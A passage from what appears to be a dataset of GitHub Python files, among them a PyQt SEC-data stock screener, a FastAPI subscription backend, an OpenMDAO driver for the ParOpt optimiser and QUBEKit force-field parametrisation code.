model.save_pretrained(target_dir)\r\n tokenizer.save_pretrained(target_dir)\r\n\r\n # Rename the folder\r\n new_dir = os.path.join(model_dir, f\"{formatted_model_name}\")\r\n shutil.move(target_dir, new_dir)\r\n\r\n print(f\"Model and tokenizer for '{model_name}' downloaded and saved in '{new_dir}'.\")\r\n\r\nif __name__ == \"__main__\":\r\n # Read model name from settings.json\r\n with open('settings.json') as settings_file:\r\n settings = json.load(settings_file)\r\n model_name_or_path = settings['model_name_or_path']\r\n\r\n # Check if the model directory already exists\r\n model_path = os.path.join(model_dir, model_name_or_path.replace('--', '_'))\r\n if not os.path.exists(model_path):\r\n # Download the specified model if it doesn't exist\r\n download_model(model_name_or_path)\r\n else:\r\n print(f\"Model {model_name_or_path} already exists.\")\r\n\r\n","repo_name":"libraryofcelsus/AetherNode","sub_path":"Download_Model.py","file_name":"Download_Model.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4336627685","text":"# Program by Joe Doro\r\n# Chapter 2, EX 9, PG 78\r\n\r\ndef main():\r\n \r\n tempC = int(input('Enter a temperature in Celsius: '))\r\n\r\n tempF = tempC * 1.8 + 32\r\n\r\n print('The temperature you entered is equal to:', tempF, 'F')\r\n\r\nmain()\r\n","repo_name":"JoeSDoro/Python_Class","sub_path":"chp2ex9.py","file_name":"chp2ex9.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39257376470","text":"import sys\nimport os\nimport requests\nimport time\n\nfrom PyQt5.QtCore import QObject, QThread, pyqtSignal\nfrom PyQt5.QtWidgets import QApplication, QDialog, QMainWindow, QMessageBox\nfrom PyQt5.uic import loadUi\n\nfrom screener import Ui_MainWindow\n\nclass Worker(QObject):\n finished = pyqtSignal()\n progress = pyqtSignal(int)\n total_size = pyqtSignal(int)\n\n def download_historical_data(self):\n url = \"http://www.sec.gov/Archives/edgar/daily-index/xbrl/companyfacts.zip\"\n self.download(url, \"historical/companyfacts.zip\", 1200000000)\n\n def download_stock_prices(self):\n url = \"https://www.sec.gov/files/company_tickers.json\"\n self.download(url, \"json/company_tickers.json\", 900000)\n\n def download(self, url, filename, total_size):\n\n headers = {'User-agent': \"jmq@hotmail.com\"}\n response = requests.get(url, headers=headers, stream=True)\n print(\"total size is \" + str(total_size))\n self.total_size.emit(total_size)\n\n block_size = 32 * 1024\n \n current_size = 0\n \n with open(filename, \"wb\") as tickers:\n for data in response.iter_content(block_size):\n current_size += len(data)\n self.progress.emit(current_size)\n tickers.write(data)\n \n print(\"current size is \" + str(current_size))\n\n self.progress.emit(total_size)\n self.finished.emit()\n \n\nclass Window(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setupUi(self)\n self.create_directories()\n\n self.setup_actions()\n #self.connectSignalsSlots()\n #self.actionAbout.triggered.connect(self.about)\n\n \"\"\"\n def connectSignalsSlots(self):\n self.action_Exit.triggered.connect(self.close)\n self.action_Find_Replace.triggered.connect(self.findAndReplace)\n self.action_About.triggered.connect(self.about)\n\n def findAndReplace(self):\n dialog = FindReplaceDialog(self)\n dialog.exec()\n\n \"\"\"\n def about(self):\n QMessageBox.about(\n self,\n \"About Sample Editor\",\n \"

A sample text editor app built with:

\"\n \"

- PyQt

\"\n \"

- Qt Designer

\"\n \"

- Python

\",\n )\n\n def create_directories(self):\n dirs = [\"json\", \"historical\"]\n for dir in dirs:\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n def jmqdownload_company_tickers(self):\n pass\n\n def setup_actions(self):\n self.actionAbout.triggered.connect(self.software_info)\n self.actionDownload_Historical_Data.triggered.connect(self.download_historical)\n self.actionDownload_Stock_Prices.triggered.connect(self.download_prices)\n\n def software_info(self):\n QMessageBox.about(self, \"StockScreener\", \"v0.1\")\n\n def download_prices(self):\n self.progressBar.setValue(0)\n\n self.thread = QThread()\n self.worker = Worker()\n self.worker.moveToThread(self.thread)\n \n self.thread.started.connect(self.worker.download_stock_prices)\n self.worker.finished.connect(self.thread.quit)\n self.worker.finished.connect(self.worker.deleteLater)\n self.thread.finished.connect(self.thread.deleteLater)\n self.worker.progress.connect(self.update_progress_bar)\n self.worker.total_size.connect(self.update_progress_bar_range)\n\n self.thread.start()\n \n def download_historical(self, func):\n self.progressBar.setValue(0)\n\n self.thread = QThread()\n self.worker = Worker()\n self.worker.moveToThread(self.thread)\n \n self.thread.started.connect(self.worker.download_historical_data)\n self.worker.finished.connect(self.thread.quit)\n self.worker.finished.connect(self.worker.deleteLater)\n self.thread.finished.connect(self.thread.deleteLater)\n self.worker.progress.connect(self.update_progress_bar)\n self.worker.total_size.connect(self.update_progress_bar_range)\n\n self.thread.start()\n \n def update_progress_bar(self, value):\n self.progressBar.setValue(value)\n\n def update_progress_bar_range(self, range):\n self.progressBar.setRange(0, range)\n\n \nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n win = Window()\n win.show()\n sys.exit(app.exec())\n","repo_name":"jmqjmq/QtStockScreener","sub_path":"py/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15168004054","text":"import scipy.stats as sp\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndef get_pearsonr(dataframe, names_of_variables):\n num = 0\n for variable1 in names_of_variables:\n num += 1\n for variable2 in names_of_variables[num:]:\n if variable1 != variable2:\n correlation = sp.pearsonr(dataframe[variable1], dataframe[variable2])\n print(\"The significance (p) of correlation \" + \"(\" + str(correlation[0]) + \")\" + \" between \" + variable1 + \" and \" + variable2 + \": \" + str(correlation[1]))\n\n\ndef plot_correlations(dataframe, names_of_variables):\n '''\n '''\n df = sns.dataframe[names_of_variables]\n sns.pairplot(df, kind=\"scatter\", hue=\"species\", markers=[\"o\", \"s\", \"D\"], palette=\"Set2\")\n plt.show()\n\n\ndef mean_std_of_variables(dataframe, names_of_variable):\n '''\n '''\n return dataframe[names_of_variable].describe()['mean':'std']\n","repo_name":"kimyoungwon/python01_2019_project","sub_path":"Correlations_Mean_SD.py","file_name":"Correlations_Mean_SD.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40419203527","text":"import numpy as np\nimport random\n\n\ndef synthesize(acc_distribution, n_papers, papers_page, J, theta):\n '''\n \n :param acc_distribution: \n :param n_papers: \n :param papers_page: \n :param J: \n :param theta: \n :return:GT- ground truth values\n GT = [obj_1_val, obj_2_val, ..]\n psi_obj - observations \n psi_obj = [[obj_1 values], []]\n psi_w - workers' judgments on papers\n psi_w = [{obj_id: val,..}, {}], index === worker's id\n '''\n\n GT = [np.random.binomial(1, theta) for _ in range(n_papers)]\n\n # generate observations\n pages_n = n_papers / papers_page\n psi_obj = [[] for obj in range(n_papers)]\n psi_w = [{} for _ in range(pages_n*J)]\n for page_id in range(pages_n):\n for _pointer in range(J):\n worker_id = page_id * J + _pointer\n worker_acc = random.choice(acc_distribution)\n for obj_id in range(page_id*papers_page, page_id*papers_page+papers_page, 1):\n gold_value = GT[obj_id]\n if gold_value:\n worker_judgment = np.random.binomial(1, worker_acc)\n else:\n worker_judgment = np.random.binomial(1, 1-worker_acc)\n psi_obj[obj_id].append(worker_judgment)\n psi_w[worker_id].update({obj_id: worker_judgment})\n return GT, psi_obj, psi_w\n","repo_name":"Evgeneus/scope-based-classification-algorithm","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5668341693","text":"\"\"\" Model for predicting user churn. \"\"\"\nimport os\nimport mlflow\nimport pickle\nimport pandas as pd\n\nfrom config import settings\n\nMODEL_REGISRTY_PATH = f\"models:/{settings.model_name}/{settings.stage}\"\nMLFLOW_URI = f\"http://{settings.mlflow_host}:5000\"\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"secret.json\"\n\n\nmlflow.set_tracking_uri(MLFLOW_URI)\n\nwith open(\"app/models/min_max_scaler.bin\", \"rb\") as f:\n scaler = pickle.load(f)\n\nwith open(\"app/models/ohe.bin\", \"rb\") as f:\n ohe = pickle.load(f)\n\n\ndef prepare_features(users: list) -> pd.DataFrame:\n \"\"\"\n Prepare features for model.\n\n Args:\n users (list): List of dictionaries with user data.\n\n Returns:\n pd.DataFrame: DataFrame with prepared features.\n\n \"\"\"\n num_features = [\"tenure\", \"MonthlyCharges\", \"TotalCharges\"]\n cat_features = [\n \"gender\",\n \"SeniorCitizen\",\n \"Partner\",\n \"Dependents\",\n \"PhoneService\",\n \"MultipleLines\",\n \"InternetService\",\n \"OnlineSecurity\",\n \"OnlineBackup\",\n \"DeviceProtection\",\n \"TechSupport\",\n \"StreamingTV\",\n \"StreamingMovies\",\n \"Contract\",\n \"PaperlessBilling\",\n \"PaymentMethod\",\n ]\n df = pd.DataFrame(users)\n df.TotalCharges = pd.to_numeric(df.TotalCharges, errors=\"coerce\")\n df = df.iloc[:, 1:]\n X = ohe.transform(df[cat_features])\n X = pd.DataFrame(X, columns=ohe.get_feature_names_out())\n X = pd.concat([X, df[num_features]], axis=1)\n features = X.columns.values\n X = pd.DataFrame(scaler.transform(X))\n X.columns = features\n return X\n\n\nmodel = mlflow.pyfunc.load_model(MODEL_REGISRTY_PATH)\n","repo_name":"kkruglik/mlops-zoomcamp-project","sub_path":"app/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41015372175","text":"# reads the requested files and asserts that there aren't any duplicate matchboxes\nfrom Board import Board\nmenacesFile = \"../Menaces.txt\"\nwith open(menacesFile, \"r\") as infile:\n fnames = infile.readlines()\nfor fname in fnames:\n fname = fname.strip()\n try:\n with open(fname, \"r\") as infile:\n lines = infile.readlines()\n for i in range(len(lines)):\n print(i)\n board1 = lines[i].split(\";\")[0]\n actualBoard1 = Board(int(len(board1) ** 0.5))\n actualBoard1._grid = [board1[i] for i in range(len(board1))]\n for j in range(i + 1, len(lines)):\n board2 = lines[j].split(\";\")[0]\n actualBoard2 = Board(int(len(board2) ** 0.5))\n actualBoard2._grid = [board2[i] for i in range(len(board2))]\n try:\n assert board1 != board2\n except AssertionError:\n print(f\"line {i} of {fname}: {board1}\")\n print(f\"line {j} of {fname}: {board2}\")\n try:\n assert not actualBoard1.isEquivalentTo(actualBoard2)\n except AssertionError:\n print(f\"line {i} of {fname}: {board1}\")\n print(f\"line {j} of {fname}: {board2}\")\n print(f\"Finished checking {fname}\")\n except FileNotFoundError:\n pass\n","repo_name":"GabeByk/MENACE","sub_path":"duplicateChecker.py","file_name":"duplicateChecker.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38506901439","text":"\"\"\"\nOpenMDAO Wrapper for ParOpt\n\"\"\"\n\nimport numpy as np\nimport mpi4py.MPI as MPI\n\nfrom paropt import ParOpt\nimport openmdao\nfrom openmdao.core.driver import Driver\n\n\nclass ParOptDriver(Driver):\n \"\"\"\n Driver wrapper for ParOpt\n\n Attributes\n ----------\n fail : bool\n Flag that indicates failure of most recent optimization.\n iter_count : int\n Counter for function evaluations.\n result : OptimizeResult\n Result returned from optimize call.\n opt_settings : dict\n Dictionary of solver-specific options. See the ParOpt documentation.\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initialize the ParOptDriver\n\n Parameters\n ----------\n **kwargs : dict of keyword arguments\n Keyword arguments that will be mapped into the Driver options.\n \"\"\"\n super().__init__(**kwargs)\n\n # What we support\n self.supports[\"optimization\"] = True\n\n self.result = None\n self._dvlist = None\n self.fail = False\n self.iter_count = 0\n self.paropt_use_qn_correction = False\n\n return\n\n def _declare_options(self):\n \"\"\"\n Declare options before kwargs are processed in the init method.\n \"\"\"\n\n info = ParOpt.getOptionsInfo()\n\n for name in info:\n default = info[name].default\n descript = info[name].descript\n values = info[name].values\n if info[name].option_type == \"bool\":\n self.options.declare(name, default, types=bool, desc=descript)\n elif info[name].option_type == \"int\":\n self.options.declare(\n name,\n default,\n types=int,\n lower=values[0],\n upper=values[1],\n desc=descript,\n )\n elif info[name].option_type == \"float\":\n self.options.declare(\n name,\n default,\n types=float,\n lower=values[0],\n upper=values[1],\n desc=descript,\n )\n elif info[name].option_type == \"str\":\n if default is None:\n self.options.declare(\n name, default, types=str, allow_none=True, desc=descript\n )\n else:\n self.options.declare(name, default, types=str, desc=descript)\n elif info[name].option_type == \"enum\":\n self.options.declare(name, default, values=values, desc=descript)\n\n return\n\n def _setup_driver(self, problem):\n \"\"\"\n Prepare the driver for execution.\n\n This is the final thing to run during setup.\n\n Parameters\n ----------\n paropt_problem : \n Pointer\n \"\"\"\n\n super()._setup_driver(problem)\n\n # Raise error if multiple objectives are provided\n if len(self._objs) > 1:\n msg = \"ParOpt currently does not support multiple objectives.\"\n raise RuntimeError(msg.format(self.__class__.__name__))\n\n # Create the ParOptProblem from the OpenMDAO problem\n self.paropt_problem = ParOptProblem(problem)\n\n # We may bind the external method for quasi-newton update correction\n # if specified\n if self.paropt_use_qn_correction:\n self.paropt_problem.computeQuasiNewtonUpdateCorrection = (\n self.computeQuasiNewtonUpdateCorrection.__get__(self.paropt_problem)\n )\n\n # Take only the options declared from ParOpt\n info = ParOpt.getOptionsInfo()\n paropt_options = {}\n for key in self.options:\n if key in info.keys():\n paropt_options[key] = self.options[key]\n\n self.opt = ParOpt.Optimizer(self.paropt_problem, paropt_options)\n\n return\n\n def run(self):\n \"\"\"\n Optimize the problem using the ParOpt optimizer.\n\n Returns\n -------\n boolean\n Failure flag; True if failed to converge, False is successful.\n \"\"\"\n # Note: failure flag is always False\n self.opt.optimize()\n\n return False\n\n def use_qn_correction(self, method):\n \"\"\"\n Bind an external function which handles the quasi-newton update\n correction to the paropt problem instance\n \"\"\"\n\n self.paropt_use_qn_correction = True\n self.computeQuasiNewtonUpdateCorrection = method\n return\n\n\nclass ParOptProblem(ParOpt.Problem):\n def __init__(self, problem):\n \"\"\"\n ParOptProblem class to pass to the ParOptDriver. Takes\n in an instance of the OpenMDAO problem class and creates\n a ParOpt problem to be passed into ParOpt through the\n ParOptDriver.\n \"\"\"\n\n self.problem = problem\n\n self.comm = self.problem.comm\n self.nvars = None\n self.ncon = None\n self.nineq = None\n\n # Discard constraints with upper bound larger than this\n self.constr_upper_limit = 1e20\n\n # Discard constraints with lower bound smaller than this\n self.constr_lower_limit = -1e20\n\n # Get the design variable, objective and constraint objects from OpenMDAO\n self.om_dvs = self.problem.model.get_design_vars()\n self.om_con = self.problem.model.get_constraints()\n self.om_obj = self.problem.model.get_objectives()\n\n # Get the number of design vars from the openmdao problem\n self.nvars = 0\n for name, meta in self.om_dvs.items():\n size = meta[\"size\"]\n self.nvars += size\n\n # Get the number of constraints from the openmdao problem\n self.ncon = 0\n self.nineq = 0\n for name, meta in self.om_con.items():\n # If current constraint is equality constraint\n if meta[\"equals\"] is not None:\n self.ncon += meta[\"size\"]\n # Else, current constraint is inequality constraint\n else:\n if meta[\"lower\"] > self.constr_lower_limit:\n self.ncon += meta[\"size\"]\n self.nineq += meta[\"size\"]\n if meta[\"upper\"] < self.constr_upper_limit:\n self.ncon += meta[\"size\"]\n self.nineq += meta[\"size\"]\n\n # Initialize the base class\n super(ParOptProblem, self).__init__(\n self.comm,\n nvars=self.nvars,\n num_dense_constraints=self.ncon,\n num_dense_inequalities=self.nineq,\n )\n\n return\n\n def getVarsAndBounds(self, x, lb, ub):\n \"\"\"Set the values of the bounds\"\"\"\n\n # Get design vars from openmdao as a dictionary\n desvar_vals = self.problem.driver.get_design_var_values()\n\n i = 0\n for name, meta in self.om_dvs.items():\n size = meta[\"size\"]\n x[i : i + size] = desvar_vals[name]\n lb[i : i + size] = meta[\"lower\"]\n ub[i : i + size] = meta[\"upper\"]\n i += size\n\n # Check if number of design variables consistent\n if i != self.nvars:\n raise ValueError(\n \"Number of design variables get (%d) is not equal to the\"\n \"number of design variables during initialzation (%d)\" % (i, self.nvars)\n )\n\n return\n\n def evalObjCon(self, x):\n \"\"\"Evaluate the objective and constraint\"\"\"\n\n # Pass the updated design variables back to OpenMDAO\n i = 0\n for name, meta in self.om_dvs.items():\n size = meta[\"size\"]\n self.problem.driver.set_design_var(name, x[i : i + size], set_remote=False)\n i += size\n\n # Solve the problem\n self.problem.model._solve_nonlinear()\n\n # Extract the values of the objectives and constraints\n con = np.zeros(self.ncon)\n constr_vals = (\n self.problem.driver.get_constraint_values()\n ) # Returns the global array\n\n i = 0\n # First we extract all inequality constraints\n for name, meta in self.om_con.items():\n if meta[\"equals\"] is None:\n size = meta[\"size\"]\n om_con_vals = np.zeros(size)\n om_con_vals[:] = constr_vals[name][0:size] # Get the local values\n if meta[\"lower\"] > self.constr_lower_limit:\n con[i : i + size] = om_con_vals - meta[\"lower\"]\n i += size\n if meta[\"upper\"] < self.constr_upper_limit:\n con[i : i + size] = meta[\"upper\"] - om_con_vals\n i += size\n\n # Then, extract rest of the equality constraints:\n for name, meta in self.om_con.items():\n if meta[\"equals\"] is not None:\n size = meta[\"size\"]\n om_con_vals = np.zeros(size)\n om_con_vals[:] = constr_vals[name][0:size] # Get the local values\n con[i : i + size] = om_con_vals - meta[\"equals\"]\n i += size\n\n # We only accept the first objective\n obj_vals = self.problem.driver.get_objective_values()\n for name, meta in self.om_obj.items():\n if isinstance(obj_vals[name], float):\n fobj = obj_vals[name]\n else:\n # In parallel, obj_vals will be array w/ len=nprocs,\n # so just take the first value\n fobj = obj_vals[name][0]\n break\n\n fail = 0\n\n return fail, fobj, con\n\n def evalObjConGradient(self, x, g, A):\n \"\"\"Evaluate the objective and constraint gradient\"\"\"\n\n # Extract gradients of objective and constraints w.r.t. all design variables\n objcon_grads = self.problem.compute_totals(get_remote=False)\n\n # Extract the objective gradient\n for name, meta in self.om_obj.items():\n i_dv = 0\n for dv_name in self.om_dvs:\n dv_subsize = self.om_dvs[dv_name][\"size\"]\n g[i_dv : i_dv + dv_subsize] = objcon_grads[(name, dv_name)][0]\n i_dv += dv_subsize\n break\n\n # Extract the constraint gradients\n # We first extract gradients of inequality constraints\n i = 0\n for name, meta in self.om_con.items():\n if meta[\"equals\"] is None:\n if meta[\"lower\"] > self.constr_lower_limit:\n for j in range(meta[\"size\"]):\n i_dv = 0\n for dv_name in self.om_dvs:\n dv_subsize = self.om_dvs[dv_name][\"size\"]\n A[i + j][i_dv : i_dv + dv_subsize] = objcon_grads[\n (name, dv_name)\n ][j]\n i_dv += dv_subsize\n i += meta[\"size\"]\n if meta[\"upper\"] < self.constr_upper_limit:\n for j in range(meta[\"size\"]):\n i_dv = 0\n for dv_name in self.om_dvs:\n dv_subsize = self.om_dvs[dv_name][\"size\"]\n A[i + j][i_dv : i_dv + dv_subsize] = -objcon_grads[\n (name, dv_name)\n ][j]\n i_dv += dv_subsize\n i += meta[\"size\"]\n\n # Then, extract equality constraint gradients\n for name, meta in self.om_con.items():\n if meta[\"equals\"] is not None:\n for j in range(meta[\"size\"]):\n i_dv = 0\n for dv_name in self.om_dvs:\n dv_subsize = self.om_dvs[dv_name][\"size\"]\n A[i + j][i_dv : i_dv + dv_subsize] = objcon_grads[\n (name, dv_name)\n ][j]\n i_dv += dv_subsize\n i += meta[\"size\"]\n\n fail = 0\n\n return fail\n","repo_name":"smdogroup/paropt","sub_path":"paropt/paropt_driver.py","file_name":"paropt_driver.py","file_ext":"py","file_size_in_byte":12005,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"31"} +{"seq_id":"74672925207","text":"import base64\nimport typing\nimport os\nimport datetime\nfrom typing import Optional\nfrom email_validator import EmailSyntaxError\nfrom pydantic.errors import EmailError\n\nfrom fastapi import FastAPI, Form, Header, Response, BackgroundTasks\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom dotenv import load_dotenv\nfrom deta import Deta\nfrom pydantic import EmailStr, BaseModel\nfrom mailer import send_registration_mail, send_event_mails\n\n\nload_dotenv()\n\ndeta = Deta(os.getenv(\"DETA_PROJECT_KEY\"))\n\ndb = deta.Base(os.getenv(\"DETA_DB_NAME\"))\nsubscriptions = deta.Base(os.getenv(\"DETA_SUBSCRIPTIONS_DB_NAME\"))\n\napp = FastAPI()\n\nALLOWED_ORIGINS = [\n \"https://troeptroep.nl\",\n]\n\nif os.getenv(\"DEBUG\"):\n ALLOWED_ORIGINS.append(\"http://localhost:8000\")\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=ALLOWED_ORIGINS,\n allow_credentials=True, # no cookies\n allow_methods=[\"POST\"],\n allow_headers=[\"*\"],\n)\n\nclass Registation(BaseModel):\n event_name: str\n email: EmailStr\n needs_gear: bool\n start_time: str\n location_description: str\n\n@app.post(\"/registrations\", status_code=201)\ndef create_registration(registration: Registation, tasks: BackgroundTasks, x_token: str = Header(None)):\n if x_token == os.getenv(\"DETA_API_TOKEN\"):\n obj = db.put(\n {\n \"event_name\": registration.event_name,\n \"email\": registration.email,\n \"needs_gear\": registration.needs_gear,\n \"created_at\": str(datetime.datetime.now()),\n }\n )\n tasks.add_task(send_registration_mail, registration, obj[\"key\"])\n\n return\n return Response(\n status_code=401,\n )\n\n@app.get(\"/subscribe/{email}\", status_code=201)\ndef create_subscription(email: str):\n email = base64.urlsafe_b64decode(email).decode()\n\n try:\n subscriptions.insert(\n {\n \"created_at\": str(datetime.datetime.now()),\n },\n email\n )\n except Exception:\n return Response(content=\"You are already subscribed to our mailing list\", status_code=304)\n return Response(content=\"Thanks for subscribing to the TroepTroep event mailing list\", status_code=200)\n\n\n@app.post(\"/subscribe\", status_code=201)\ndef _create_subscription(email: str = Form(...)):\n try:\n EmailStr.validate(email)\n except (EmailError, EmailSyntaxError):\n return Response(content=\"Invalid email address\", status_code=400)\n\n try:\n subscriptions.insert(\n {\n \"created_at\": str(datetime.datetime.now()),\n },\n email\n )\n except Exception:\n return Response(content=\"You are already subscribed to our mailing list\", status_code=304)\n return Response(content=\"Thanks for subscribing to the TroepTroep event mailing list\", status_code=200)\n\n\n@app.get(\"/unsubscribe/{email}\", status_code=201)\ndef delete_subscription(email: bytes):\n subscriptions.delete(base64.urlsafe_b64decode(email).decode())\n return Response(content=\"You have been removed from our mailing list\", status_code=200)\n\nclass Event(BaseModel):\n entity: typing.Dict[str, typing.Any]\n\"\"\"\n\"entity\": {\n \"id\": \"21837152\",\n \"type\": \"item\",\n \"attributes\": {\n \"location\": {\n \"latitude\": 49.8728253,\n \"longitude\": 8.6511929\n },\n \"meetingpoint_description\": \"wedwede\",\n \"title\": \"snibbels\",\n \"starttime\": \"2021-02-22T00:00:00+01:00\",\n \"endtime\": \"2021-02-22T21:30:00+01:00\",\n \"date\": \"2021-02-22\",\n \"city\": \"Amsterdam\",\n \"updated_at\": \"2021-02-22T21:56:11.268+01:00\",\n \"created_at\": \"2021-02-22T21:56:11.251+01:00\"\n },\n\n\"\"\"\n\n@app.post(\"/submit_event\", status_code=204)\ndef run_event_mailer(event: Event, tasks: BackgroundTasks, x_token: str = Header(None)):\n if x_token == os.getenv(\"DETA_API_TOKEN\"):\n tasks.add_task(send_event_mails, event.entity[\"attributes\"], subscriptions)\n return\n return Response(\n status_code=401,\n )","repo_name":"DonQueso89/troeptroep","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"24009369798","text":"#!/usr/bin/env python\n\nfrom QUBEKit.decorators import for_all_methods, timer_logger\nfrom QUBEKit.helpers import append_to_log\n\nfrom tempfile import TemporaryDirectory\nfrom shutil import copy\nfrom os import getcwd, chdir, path\nfrom subprocess import run as sub_run\nfrom collections import OrderedDict\nfrom copy import deepcopy\n\nfrom xml.etree.ElementTree import parse as parse_tree\nfrom simtk.openmm import app, XmlSerializer\nfrom openeye import oechem\n\nfrom openforcefield.typing.engines.smirnoff import ForceField\nfrom openforcefield.utils import get_data_filename, generateTopologyFromOEMol\n\n# TODO Users should be able to just install ONE of the necessary parametrisation methods and not worry about needing the others too.\n# Is there a nice way of doing this other than try: import ; except ImportError: pass ?\n\n\nclass Parametrisation:\n \"\"\"\n Class of methods which perform the initial parametrisation for the molecule.\n The Parameters will be stored into the molecule as dictionaries as this is easy to manipulate and convert\n to a parameter tree.\n\n Note all parameters gathered here are indexed from 0,\n whereas the ligand object indices start from 1 for all networkx related properties such as bonds!\n\n\n Parameters\n ---------\n molecule : QUBEKit molecule object\n\n input_file : an OpenMM style xml file associated with the molecule object\n\n fftype : the FF type the molecule will be parametrised with\n only needed in the case of gaff or gaff2 else will be assigned based on class used.\n\n Returns\n -------\n AtomTypes : dictionary of the atom names, the associated OPLS type and class type stored under number.\n {0: [C00, OPLS_800, C800]}\n\n Residues : dictionary of residue names indexed by the order they appear.\n\n HarmonicBondForce: dictionary of equilibrium distances and force constants stored under the bond tuple.\n {(0, 1): [eqr=456, fc=984375]}\n\n HarmonicAngleForce: dictionary of equilibrium angles and force constant stored under the angle tuple.\n\n PeriodicTorsionForce : dictionary of periodicity, barrier and phase stored under the torsion tuple.\n\n NonbondedForce : dictionary of charge, sigma and epsilon stored under the original atom ordering.\n \"\"\"\n\n def __init__(self, molecule, input_file=None, fftype=None, mol2_file=None):\n\n self.molecule = molecule\n self.input_file = input_file\n self.fftype = fftype\n self.gaff_types = {}\n\n def __repr__(self):\n return f'{self.__class__.__name__}({self.__dict__!r})'\n\n def gather_parameters(self):\n \"\"\"\n This method parses the serialised xml file and collects the parameters ready to pass them\n to build tree.\n \"\"\"\n\n # Try to gather the AtomTypes first\n for i, atom in enumerate(self.molecule.atom_names):\n self.molecule.AtomTypes[i] = [atom, 'QUBE_' + str(800 + i),\n str(self.molecule.molecule['input'][i][0]) + str(800 + i),\n self.gaff_types[atom]]\n\n input_xml_file = 'serialised.xml'\n in_root = parse_tree(input_xml_file).getroot()\n\n # Extract all bond data\n for Bond in in_root.iter('Bond'):\n bond = (int(Bond.get('p1')), int(Bond.get('p2')))\n self.molecule.HarmonicBondForce[bond] = [Bond.get('d'), Bond.get('k')]\n\n # Extract all angle data\n for Angle in in_root.iter('Angle'):\n angle = int(Angle.get('p1')), int(Angle.get('p2')), int(Angle.get('p3'))\n self.molecule.HarmonicAngleForce[angle] = [Angle.get('a'), Angle.get('k')]\n\n # Extract all non-bonded data\n i = 0\n for Atom in in_root.iter('Particle'):\n if \"eps\" in Atom.attrib:\n self.molecule.NonbondedForce[i] = [Atom.get('q'), Atom.get('sig'), Atom.get('eps')]\n i += 1\n\n # Extract all of the torsion data\n phases = ['0', '3.141592653589793', '0', '3.141592653589793']\n for Torsion in in_root.iter('Torsion'):\n tor_string_forward = tuple(int(Torsion.get(f'p{i}')) for i in range(1, 5))\n tor_string_back = tuple(reversed(tor_string_forward))\n\n if tor_string_forward not in self.molecule.PeriodicTorsionForce.keys() and tor_string_back not in self.molecule.PeriodicTorsionForce.keys():\n self.molecule.PeriodicTorsionForce[tor_string_forward] = [\n [Torsion.get('periodicity'), Torsion.get('k'), phases[int(Torsion.get('periodicity')) - 1]]]\n elif tor_string_forward in self.molecule.PeriodicTorsionForce.keys():\n self.molecule.PeriodicTorsionForce[tor_string_forward].append(\n [Torsion.get('periodicity'), Torsion.get('k'), phases[int(Torsion.get('periodicity')) - 1]])\n elif tor_string_back in self.molecule.PeriodicTorsionForce.keys():\n self.molecule.PeriodicTorsionForce[tor_string_back].append([Torsion.get('periodicity'),\n Torsion.get('k'), phases[\n int(Torsion.get('periodicity')) - 1]])\n # Now we have all of the torsions from the openMM system\n # we should check if any torsions we found in the molecule do not have parameters\n # if they don't give them the default 0 parameter this will not change the energy\n for tor_list in self.molecule.dihedrals.values():\n for torsion in tor_list:\n # change the indexing to check if they match\n param = tuple(torsion[i] - 1 for i in range(4))\n if param not in self.molecule.PeriodicTorsionForce.keys() and tuple(reversed(param)) not in self.molecule.PeriodicTorsionForce.keys():\n self.molecule.PeriodicTorsionForce[param] = [['1', '0', '0'], ['2', '0', '3.141592653589793'], ['3', '0', '0'], ['4', '0', '3.141592653589793']]\n\n # Now we need to fill in all blank phases of the Torsions\n for key in self.molecule.PeriodicTorsionForce.keys():\n vns = ['1', '2', '3', '4']\n if len(self.molecule.PeriodicTorsionForce[key]) < 4:\n # now need to add the missing terms from the torsion force\n for force in self.molecule.PeriodicTorsionForce[key]:\n vns.remove(force[0])\n for i in vns:\n self.molecule.PeriodicTorsionForce[key].append([i, '0', phases[int(i) - 1]])\n # sort by periodicity using lambda function\n for key in self.molecule.PeriodicTorsionForce.keys():\n self.molecule.PeriodicTorsionForce[key].sort(key=lambda x: x[0])\n\n # now we need to tag the proper and improper torsions and reorder them so the first atom is the central\n improper_torsions = OrderedDict()\n for improper in self.molecule.improper_torsions:\n for key in self.molecule.PeriodicTorsionForce:\n # for each improper find the corresponding torsion parameters and save\n if sorted(key) == sorted(tuple([x - 1 for x in improper])):\n # if they match tag the dihedral\n self.molecule.PeriodicTorsionForce[key].append('Improper')\n # replace the key with the strict improper order first atom is center\n improper_torsions[tuple([x - 1 for x in improper])] = self.molecule.PeriodicTorsionForce[key]\n\n torsions = deepcopy(self.molecule.PeriodicTorsionForce)\n # Remake the torsion store in the ligand\n self.molecule.PeriodicTorsionForce = OrderedDict((v, k) for v, k in torsions.items() if k[-1] != 'Improper')\n # now we need to add the impropers at the 